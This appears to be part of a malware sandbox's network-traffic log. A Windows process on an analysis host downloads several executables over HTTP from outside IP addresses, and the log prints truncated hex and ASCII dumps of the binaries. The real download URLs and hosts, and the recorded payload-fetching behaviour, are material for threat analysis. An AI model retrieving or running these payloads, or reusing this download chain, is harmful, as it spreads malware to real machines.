Sep 21, 2024 14:48:10.468923092 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:10 GMT Content-Type: application/octet-stream Content-Length: 331640 Last-Modified: Sat, 21 Sep 2024 10:55:47 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66eea633-50f78" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3d a1 ee 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 08 00 00 00 00 00 00 5e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 fb 04 00 53 00 00 00 00 00 05 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 e6 04 00 78 29 00 00 00 20 05 00 0c 00 00 00 d0 f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=f^ @ @`Sx) H.textd `.rsrc@@.reloc @B@H6Z9)^jPtY#AR\d47Z&ww\|5':T~xT7MwSaQpRtuqzD(&4 :OdV[ clprK]vY\_{'T-favw(Hn]gpj)OKVqQyP!Y;O.0@yt"u7nB=C^=Mi4b~td.#Xa`I\R!'}>}XJ
Sep 21, 2024 14:48:10.498991013 CEST	219	OUT	GET /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:10.681965113 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:10 GMT Content-Type: application/octet-stream Content-Length: 11496960 Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ea6451-af6e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 ad 2b dd 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 5d 70 fd 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 a8 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 d1 fd 00 3c 00 00 00 00 50 a5 01 d8 04 03 00 40 16 a5 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 46 00 01 28 00 00 00 00 15 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd+f#]p@` <P@`*F(8 .text6 `.rdata@@.data@.pdata@@.00cfg@@.tls@.text0p- `.text1X@.text2`b`h.rsrcPh@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49710	176.111.174.109	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.256469965 CEST	197	OUT	HEAD /kurwa HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 176.111.174.109 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49711	147.45.44.104	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.260570049 CEST	228	OUT	HEAD /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:08.880968094 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:08 GMT Content-Type: application/octet-stream Content-Length: 418816 Last-Modified: Sat, 21 Sep 2024 07:43:45 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ee7931-66400" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 21, 2024 14:48:08.881385088 CEST	220	OUT	HEAD /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:09.065464020 CEST	312	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:08 GMT Content-Type: application/octet-stream Content-Length: 11496960 Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ea6451-af6e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 21, 2024 14:48:09.065901041 CEST	227	OUT	HEAD /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:09.248594999 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:09 GMT Content-Type: application/octet-stream Content-Length: 3037032 Last-Modified: Thu, 19 Sep 2024 05:16:47 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ebb3bf-2e5768" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 21, 2024 14:48:09.249331951 CEST	216	OUT	GET /prog/66e705d09b33c_jack.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:09.432369947 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:09 GMT Content-Type: application/octet-stream Content-Length: 4249600 Last-Modified: Sun, 15 Sep 2024 16:05:36 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66e705d0-40d800" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5f 55 fb d1 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 3e 00 00 38 02 00 00 00 00 00 ae ba 3e 00 00 20 00 00 00 c0 3e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 41 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 60 ba 3e 00 4b 00 00 00 00 e0 3e 00 84 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 41 00 0c 00 00 00 10 ba 3e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_U>8> >@ @A@`>K>. A> H.text> > `.sdata>>@.rsrc.>0>@@.reloc A@@B
Sep 21, 2024 14:48:09.432496071 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: >H0&MPVjO([<([<*****([<
Sep 21, 2024 14:48:09.432507992 CEST	448	IN	Data Raw: 70 72 bb 01 00 70 6f 3d 00 00 0a 72 bf 01 00 70 72 c3 01 00 70 6f 3d 00 00 0a 72 c7 01 00 70 72 cb 01 00 70 6f 3d 00 00 0a 72 d5 00 00 70 72 cf 01 00 70 6f 3d 00 00 0a 72 d3 01 00 70 72 df 01 00 70 6f 3d 00 00 0a a2 25 18 18 8c 53 00 00 01 a2 25 Data Ascii: prpo=rprpo=rprpo=rprpo=rprpo=%S%%rp(R(182 E'-8& 8O($rpriprp(=(>%%rup(>r}
Sep 21, 2024 14:48:09.432518005 CEST	1236	IN	Data Raw: a2 14 0d 12 03 28 52 00 00 06 26 20 07 00 00 00 38 ae fe ff ff 2a 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 Data Ascii: (R& 800******([<000*********
Sep 21, 2024 14:48:09.432528973 CEST	1236	IN	Data Raw: 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 Data Ascii: ******************************
Sep 21, 2024 14:48:09.432559013 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 00 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 Data Ascii: 00**********0*([<**([<
Sep 21, 2024 14:48:09.432569981 CEST	1236	IN	Data Raw: 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 Data Ascii: 00*00([< (:&rps(9H& 8fr/pq 8Rr9po (:9&rCpt8& 9&rWpr
Sep 21, 2024 14:48:09.432580948 CEST	1236	IN	Data Raw: 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 1a 28 5b 3c 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 Data Ascii: *([<********([<*0*([<**([<
Sep 21, 2024 14:48:09.433151007 CEST	1236	IN	Data Raw: 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 Data Ascii: ****000"/******"0"0"0**
Sep 21, 2024 14:48:09.433223009 CEST	1236	IN	Data Raw: 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 Data Ascii: **00******([<**([<****
Sep 21, 2024 14:48:09.433233976 CEST	1236	IN	Data Raw: 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 0a 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 12 00 00 Data Ascii: **000***00*0********
Sep 21, 2024 14:48:12.573431969 CEST	223	OUT	GET /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:12.772156000 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:12 GMT Content-Type: application/octet-stream Content-Length: 361336 Last-Modified: Fri, 20 Sep 2024 18:02:03 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66edb89b-58378" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d b7 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 50 05 00 00 08 00 00 00 00 00 00 ee 6e 05 00 00 20 00 00 00 80 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 6e 05 00 53 00 00 00 00 80 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 5a 05 00 78 29 00 00 00 a0 05 00 0c 00 00 00 60 6d 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfPn @ `nSZx)`m H.textN P `.rsrcR@@.relocX@BnH^$spkTa\|K?wN-mEC9-#f=5spJzs_4vZUOwbnesRv@sO4] VLTV[XvF\|hI*$<gbv-Cm<[6R8!m'?jW`JI!k,O<9WXLEq !Q$@,99~%(\\|B#a wZV9kFZl[OtGz&c
Sep 21, 2024 14:48:13.056740999 CEST	226	OUT	GET /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:13.239353895 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:13 GMT Content-Type: application/octet-stream Content-Length: 3037032 Last-Modified: Thu, 19 Sep 2024 05:16:47 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ebb3bf-2e5768" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ba f7 20 98 fe 96 4e cb fe 96 4e cb fe 96 4e cb f7 ee dd cb ec 96 4e cb 60 36 89 cb ff 96 4e cb 1b cf 4b ca fc 96 4e cb 23 69 80 cb fa 96 4e cb 23 69 85 cb f0 96 4e cb c5 c8 4d ca f8 96 4e cb c5 c8 4a ca f0 96 4e cb c5 c8 4b ca df 96 4e cb c5 c8 4f ca f8 96 4e cb d9 50 35 cb fc 96 4e cb 69 c8 4f ca d3 96 4e cb fe 96 4f cb 3a 9d 4e cb 69 c8 4b ca a1 96 4e cb 69 c8 4e ca ff 96 4e cb 6c c8 b1 cb ff 96 4e cb fe 96 d9 cb ff 96 4e cb 69 c8 4c ca ff 96 4e cb 52 69 63 68 fe 96 4e cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 81 9f 25 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 [TRUNCATED] Data Ascii: MZ@8!L!This program cannot be run in DOS mode.$ NNNN`6NKN#iN#iNMNJNKNONP5NiONO:NiKNiNNlNNiLNRichNPEL%`8$P@.!@%T\ f>.h)TD*)@P..text@8 `.rdata0P(<@@.datand@.tls@.gfids@@.rsrcf h@@
Sep 21, 2024 14:48:15.249610901 CEST	216	OUT	GET /yuop/66ed9885d9aee_Day2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:48:15.698129892 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:15 GMT Content-Type: application/octet-stream Content-Length: 3141632 Last-Modified: Fri, 20 Sep 2024 15:45:09 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ed9885-2ff000" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL))) @)@ `0@))K`)@0O)) H.text) ) `.sdata@))@.rsrc`))@@.reloc@0/@B
Sep 21, 2024 14:48:15.786710024 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:15 GMT Content-Type: application/octet-stream Content-Length: 3141632 Last-Modified: Fri, 20 Sep 2024 15:45:09 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ed9885-2ff000" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL))) @)@ `0@))K`)@0O)) H.text) ) `.sdata@))@.rsrc`))@@.reloc@0/@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49712	103.130.147.211	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.260890961 CEST	203	OUT	HEAD /Files/1.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 103.130.147.211 Cache-Control: no-cache
Sep 21, 2024 14:48:08.851077080 CEST	275	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 20 Sep 2024 19:40:07 GMT ETag: "65ba6e-6229234d7ee13" Accept-Ranges: bytes Content-Length: 6666862 Content-Type: application/x-msdownload
Sep 21, 2024 14:48:08.851545095 CEST	202	OUT	GET /Files/1.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 103.130.147.211 Cache-Control: no-cache
Sep 21, 2024 14:48:09.021869898 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 20 Sep 2024 19:40:07 GMT ETag: "65ba6e-6229234d7ee13" Accept-Ranges: bytes Content-Length: 6666862 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 0e 7d ed 66 00 74 5f 00 a6 25 00 00 e0 00 06 01 0b 01 02 23 00 40 48 00 00 c6 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c6 00 00 06 00 00 29 87 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 a0 b3 00 42 00 00 00 00 b0 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b3 00 68 20 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 f9 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}ft_%#@HZfPH@)f Bh H.text>H@H`P`.dataPHFH@`.rdata8pH`H@`@/4IH@0@.bssTfL`.edataBL@0@.idataL@0.CRT4L@0.tlsL@0.reloch "L@0B/14Z@B/29 Z@B/41XLN\|\@B/55B \@B/67T]
Sep 21, 2024 14:48:09.021893024 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 38 30 00 00 00 00 00 61 09 00 00 00 30 c5 00 00 0a 00 00 00 cc 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 31 00 00 00 00 00 05 8b 01 00 00 40 c5 00 00 8c 01 00 00 d6 5d 00 00 00 00 Data Ascii: @0B/80a0]@B/91@]@B/102b_@B
Sep 21, 2024 14:48:09.021904945 CEST	1236	IN	Data Raw: fa 20 7e e7 89 cb 83 f3 01 80 fa 22 0f 44 cb eb e8 8d b4 26 00 00 00 00 8d 76 00 84 d2 74 14 8d 74 26 00 0f b6 50 01 83 c0 01 84 d2 74 05 80 fa 20 7e f0 a3 04 b0 8c 00 8b 1d 4c 87 f3 00 85 db 74 14 b8 0a 00 00 00 f6 45 d0 01 0f 85 e2 00 00 00 a3 Data Ascii: ~"D&vtt&Pt ~LtEP$44$,H EFEE$,Hp4$],HCOt$L$$7,H9}uEEE UG<D$ D$
Sep 21, 2024 14:48:09.022017956 CEST	672	IN	Data Raw: 28 89 45 ec 8b 45 78 89 45 e0 8b 45 7c 89 45 e4 8b 85 80 00 00 00 89 45 d8 8b 85 84 00 00 00 89 45 dc 8d 45 44 89 44 24 04 8d 45 f4 89 04 24 e8 6a 6f 3b 00 90 c9 c3 55 89 e5 83 ec 10 c7 45 f4 c8 17 40 00 c7 45 f8 c4 17 40 00 c7 45 fc 00 00 00 00 Data Ascii: (EExEE\|EEEEDD$E$jo;UE@E@EEDEEEDU}u,EEE}tEUPEEE@Hu,EEE}tEUPEEE@
Sep 21, 2024 14:48:09.022030115 CEST	1236	IN	Data Raw: 09 8b 45 84 8b 55 80 89 50 1c b8 00 00 00 00 89 45 d0 8b 45 d0 e9 dc 01 00 00 8b 45 e4 8b 40 3c 89 44 24 08 c7 44 24 04 50 70 88 00 8b 45 0c 89 04 24 e8 98 25 48 00 89 45 d8 8b 45 e4 8b 55 d8 89 50 3c 83 7d d8 00 75 4e c7 44 24 04 00 00 00 00 8b Data Ascii: EUPEEE@<D$D$PpE$%HEEUP<}uND$E$:E\|x\|t\|xPEE_E@<.{E@@E@HtlE@DE9t;EtptttpP
